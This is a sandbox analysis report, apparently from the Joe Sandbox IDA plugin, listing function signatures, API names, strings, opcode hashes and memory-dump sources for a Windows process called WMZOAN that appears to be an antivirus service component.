                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$FreeProcess$CloseEnterEventHandleLeave$DeleteReset
                                            • String ID:
                                            • API String ID: 1995290849-0
                                            • Opcode ID: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                            • Instruction ID: fd5ea752b6625aace240e5dc115a6ac8a79eac1ae5096a798ed6b9a4de507a32
                                            • Opcode Fuzzy Hash: 2f4077f28f01d0b1ccc1c48d704ff51649a530c0da5e40bb1ca44111346c6a52
                                            • Instruction Fuzzy Hash: B2311BB4511E0985EB07DF63FC943D423A6BB5CBD5F8D0129AB4A8B270EF3A8499C214
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeave$CloseCreateValue
                                            • String ID: ?$SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                            • API String ID: 93015348-1041928032
                                            • Opcode ID: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                            • Instruction ID: 955b1bef443a43e40f7389cebc0d05d3cfed999bfec6c75915e9fb821c1678e4
                                            • Opcode Fuzzy Hash: 29268dff0e12a6c2837206cbe8abbe1365c88675c14f20743fcf2bb12703bfc8
                                            • Instruction Fuzzy Hash: E3714676211A4082E762CB26F8507DA73A5F78D7E4F141226FB6A4B7F4DB3AC485C700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressProc$EnterLeave$LibraryLoad
                                            • String ID: vseqrt.dll$vseqrtAdd$vseqrtInit$vseqrtRelease
                                            • API String ID: 3682727354-300733478
                                            • Opcode ID: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                            • Instruction ID: 5756194132ff8dd7ec1522ad033bffa79c37130547d86cec9d6c1639cfe77c95
                                            • Opcode Fuzzy Hash: a0032026953fb9b355f8eab640deda5175e427bf7f4d2824b31ceb49df98d19c
                                            • Instruction Fuzzy Hash: 8C710175220B4186EB52DF26F894BC533A4F78CBE4F441226EA598B3B4DF3AC945C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$AllocLeaveProcess$EnterTimerWaitable
                                            • String ID: amps_Init: done, pHandle=%p$amps_Init: iFlags=%d, pid=%d, sid=%d
                                            • API String ID: 2587151837-1427723692
                                            • Opcode ID: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                            • Instruction ID: a7c4065e0455d4df5ce4727384a6dec66c16779501c9bb3b2af2b379a082be6c
                                            • Opcode Fuzzy Hash: 056e3220293f8a27eada56f59a4c806f255f255991a422811975143a91f7a127
                                            • Instruction Fuzzy Hash: 9F5114B5225B4082FB13CB27F8847D963A5F78CBD0F445525BB4A4B7B8DB7AC4448700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CurrentDirectory$LibraryLoad$AddressAttributesFileHandleModuleProc
                                            • String ID: SetDllDirectoryW$kernel32.dll
                                            • API String ID: 3184163350-3826188083
                                            • Opcode ID: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                            • Instruction ID: 3ea874f08b0d6ae9fbaedd0e680489d05007b391355801732f4c7fbd06edc96d
                                            • Opcode Fuzzy Hash: 09225629eee72228c5d7f95fa2eee3f64651a4a6406a600936b89273ecb07b9f
                                            • Instruction Fuzzy Hash: FD41F6B1218A8582EB22DF12F8547DA73A5F79D7D4F400125EB8A0BAB5DF7EC548CB40
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen
                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                            • API String ID: 3424473247-996641649
                                            • Opcode ID: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                            • Instruction ID: 5475aedf582102907cd33adbfaf34f9b11ebc9e91273ce6565e0ea0cfbbdf015
                                            • Opcode Fuzzy Hash: 1d37d06b5998b82bc2dc7011aec07efaf1f4b1bb41d2d67d0687b588f1a55b3d
                                            • Instruction Fuzzy Hash: FE3137B062A74082FB03CB53BD447E962A5E75DBD8F554019EB0E0BBB6DBBEC1558700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: String$ByteCharMultiWide$ErrorLast
                                            • String ID:
                                            • API String ID: 1775797328-0
                                            • Opcode ID: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                            • Instruction ID: 7820e0e177e3580e7fbac086e7e180635334a87404cd07a7d6eea56579f34d7e
                                            • Opcode Fuzzy Hash: 802883c3254266504f9bffab4fe863b98e9923c524f0017741f2ad98f2b9a469
                                            • Instruction Fuzzy Hash: 7CE18BB27007808AEB66DF26A54079977E1F74EBE8F144225FB6957BE8DB38C941C700
                                            APIs
                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C52
                                            • GetLastError.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C6C
                                            • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009C91
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CD4
                                            • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009CF2
                                            • GetEnvironmentStrings.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D09
                                            • MultiByteToWideChar.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D37
                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009D73
                                            • FreeEnvironmentStringsA.KERNEL32(?,?,?,?,?,0000000140005C67), ref: 0000000140009E19
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: EnvironmentStrings$Free$ByteCharErrorLastMultiWide
                                            • String ID:
                                            • API String ID: 1232609184-0
                                            • Opcode ID: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                            • Instruction ID: a97fb2b29f1dbdd40f84dfefdd532c69b8fe37edd6617e3b903b273dff31e607
                                            • Opcode Fuzzy Hash: 0fe341c893830b3e5934a62294215ba1eeb7ab0cb4f80f00c247d68fe650ca03
                                            • Instruction Fuzzy Hash: 9851AEB164564046FB66DF23B8147AA66D0BB4DFE0F484625FF6A87BF1EB78C4448300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$CriticalSection$EnterFreeProcess$Leave
                                            • String ID: H
                                            • API String ID: 2107338056-2852464175
                                            • Opcode ID: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                            • Instruction ID: c1f1c0cc251b461ea163c40135a27997c94af954a8846501eddf5ed74a01cb36
                                            • Opcode Fuzzy Hash: 5b70108e8ada33305ec7243e3672b6dc87a1b4650feeecbcfbcd773178ed88ea
                                            • Instruction Fuzzy Hash: D5513B76216B4086EBA2DF63B84439A73E5F74DBD0F098128EB9D87765EF39C4558300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$AddressEnterLeaveProc$LibraryLoadTimerWaitable
                                            • String ID: fnCallback: hScan=%d, evId=%d, context=%p$fnCallback: hScan=%d, putting event %d into listening threads queues$fnCallback: hScan=%d, quarantine, result %d
                                            • API String ID: 1322048431-2685357988
                                            • Opcode ID: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                            • Instruction ID: ba1df9fb3c509f4e652456910b8147ac8aac6905a945631cefe2604201aedb7e
                                            • Opcode Fuzzy Hash: 8f454d8f96427bc7f4d6fc52e9fe6703152659d2229fc404623004bd99a71f34
                                            • Instruction Fuzzy Hash: 645106B5214B4181EB13CF16F880BD923A4E79DBE4F445622BB594B6B4DF3AC584C740
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterLeaveTimerWaitable
                                            • String ID: doCleanup: enter, cAmpEntry %p$doCleanup: pid %d, marking the cAmpEntry pointer for deletion$doCleanup: pid %d, removing cAmpEntry, index is %d
                                            • API String ID: 2984211723-3002863673
                                            • Opcode ID: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                            • Instruction ID: 6ce834a9fa2c46ab9e722fc1bcf1c858386cde021ca473021475461b430fce50
                                            • Opcode Fuzzy Hash: a738ef0df41c9c2085df25b69143ddd466836247f0acf0cab1fab4ffcf6577b7
                                            • Instruction Fuzzy Hash: 9B4101B5214A8591EB128F07F880B9863A4F78CBE4F495226FB1D0BBB4DB7AC591C710
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CloseHandleMultipleObjectsOpenProcessWait
                                            • String ID: doMonitor: end process id=%d, result from WaitForMultipleObjects=%d$doMonitor: monitoring process id=%d$fnMonitor: monitor thread for ctx %p
                                            • API String ID: 678758403-4129911376
                                            • Opcode ID: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                            • Instruction ID: f397f01a700ed75a1720fb106c04e764a2ecaef09c032a262f7e58a7780e1373
                                            • Opcode Fuzzy Hash: 622955a85f652782e43c0e0864684ab55b88adcc3dc18936af4ab90c870e9f37
                                            • Instruction Fuzzy Hash: B63107B6610A4582EB12DF57F84079963A4E78CBE4F498122FB1C0B7B4DF3AC585C710
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen
                                            • String ID:
                                            • API String ID: 3424473247-0
                                            • Opcode ID: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                            • Instruction ID: a11592c0991bfac199573d0d609f53e0c1426f0a5ad78f28403dae96cf8670eb
                                            • Opcode Fuzzy Hash: c17ffa923c8182584db73c91a06df651023cf72d925272b18aed562ea20615b1
                                            • Instruction Fuzzy Hash: C8513AB6701640CAE666DFA3B84479A67E0F74DFC8F588428AF4E4B721DA38D155A700
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: BlockUnwind$BaseEntryFunctionImageLookupThrow
                                            • String ID: bad exception$csm$csm$csm
                                            • API String ID: 3766904988-820278400
                                            • Opcode ID: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                            • Instruction ID: ec44bdd804db6766ea80e989845e9f4c5c79a3e5de674617e5e8a62493c248da
                                            • Opcode Fuzzy Hash: 211ea14586251fca33d837236c8444fcda6bc332046b6eb3b50ec8ef4bad2153
                                            • Instruction Fuzzy Hash: 2202C17220478086EB66DB27A4447EEB7A5F78DBC4F484425FF894BBAADB39C550C700
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$EnterEventLeaveMultipleObjectsWait$ResetSleep
                                            • String ID:
                                            • API String ID: 2707001247-0
                                            • Opcode ID: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                            • Instruction ID: f9d573460b216e7eeefce72b36cf093424a31f8579033a03516ac6dab9ef0102
                                            • Opcode Fuzzy Hash: 81fbcb92f811cf70c85be9260a27baa2b932eaa25df2b6e09ac4b98cba08ed51
                                            • Instruction Fuzzy Hash: BC3159B6304A4492EB22DF22F44479AB360F749BE4F444121EB9E07AB4DF39D489C708
                                            APIs
                                            • __FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 00007FFB23B04861
                                              • Part of subcall function 00007FFB23B06BC4: __GetUnwindTryBlock.LIBCMT ref: 00007FFB23B06C07
                                              • Part of subcall function 00007FFB23B06BC4: __SetUnwindTryBlock.LIBVCRUNTIME ref: 00007FFB23B06C2C
                                            • Is_bad_exception_allowed.LIBVCRUNTIME ref: 00007FFB23B04939
                                            • __FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 00007FFB23B04B87
                                            • std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFB23B04C94
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                            • String ID: csm$csm$csm
                                            • API String ID: 849930591-393685449
                                            • Opcode ID: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                            • Instruction ID: f172bdc5f73e449fe22b4ca8eb7e602253b338a857e64e537f9f58a667ba64e2
                                            • Opcode Fuzzy Hash: f1adb4ecd083bc80385bf1a1a2c543f93b0b2fb07cc426c5636c8daff4c8f18a
                                            • Instruction Fuzzy Hash: 08D172B6A087818AEB219F75D8883AD77A0FB45788F180275DECD67B55CF38E481CB00
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                            • Instruction ID: 4159c8d252e8bf7a629169213e0784b10943506046d671ff930a732f0a48acbb
                                            • Opcode Fuzzy Hash: d3d786e63681585cbf03c2d219a109844956a30e82e5544b8f66a627abd00fb2
                                            • Instruction Fuzzy Hash: EC1145B4915A4081F70BDF97B8187D522E2FB8DBD9F484025E70A4B2B0DF7E8499C601
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$FreeProcess
                                            • String ID:
                                            • API String ID: 3859560861-0
                                            • Opcode ID: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                            • Instruction ID: 56b7ada565ecb083b5892330f511bf6cd885877ef2bee609f5ffef12e4ab2997
                                            • Opcode Fuzzy Hash: 2b20d9b04266fb418ab88241afe0be8334b025a235c71ad7c61a809fe6dc3135
                                            • Instruction Fuzzy Hash: E01172B4918A8081F71BDBA7B81C7D522E2FB8DBD9F444015E70A4B2F0DFBE8499C601
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247761764.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                            • Associated: 0000000C.00000002.2247747344.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247779189.00007FFB23B12000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247795788.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247810047.00007FFB23B1F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_7ffb23b00000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: AddressFreeLibraryProc
                                            • String ID: api-ms-$ext-ms-
                                            • API String ID: 3013587201-537541572
                                            • Opcode ID: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                            • Instruction ID: f872ed3915c46412b5a7056c10331bf194239ad08fe46f68028e30889c0d7464
                                            • Opcode Fuzzy Hash: d27e4f6126b13d6b256a918f8f190c41ea59ca19706b8a974bfb2f07ede01360
                                            • Instruction Fuzzy Hash: AB41E3A9B19A8241EA17CF36DCA86BE2391BF45B90F0C4575DDCE67794EE3CE4058300
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: CriticalSection$CloseCreateEnterLeaveQueryValue
                                            • String ID: SYSTEM\CurrentControlSet\Services\vseamps\Parameters$action
                                            • API String ID: 1119674940-1966266597
                                            • Opcode ID: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                            • Instruction ID: f124d29d71956a548941c3df06686b2c3eef24402cfc23b06ee64cf3511db711
                                            • Opcode Fuzzy Hash: f3533de3366e7bda9e1b35d25a0c2c8c172dac4edddfecf2711061c5e43c3c9b
                                            • Instruction Fuzzy Hash: 6F31F975214B4186EB22CF26F884B9573A4F78D7A8F401315FBA94B6B4DF3AC148CB00
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000C.00000002.2247680993.0000000140001000.00000020.00000001.01000000.00000008.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 0000000C.00000002.2247666508.0000000140000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247699629.0000000140014000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247715643.000000014001A000.00000008.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 0000000C.00000002.2247730976.000000014001E000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_12_2_140000000_WMZOAN.jbxd
                                            Similarity
                                            • API ID: Heap$AllocProcesslstrlen$ComputerName
                                            • String ID: Security=impersonation static true$ampIfEp$ncalrpc
                                            • API String ID: 3702919091-996641649
                                            • Opcode ID: 625aae782f6e6c8352582bed456207495076f7317be3b5f58fd10a3b56526d44
                                            • Instruction ID: 080136972d91dcf489914e021d1613250a4fb989530f4420e20b1ceb3111c88a
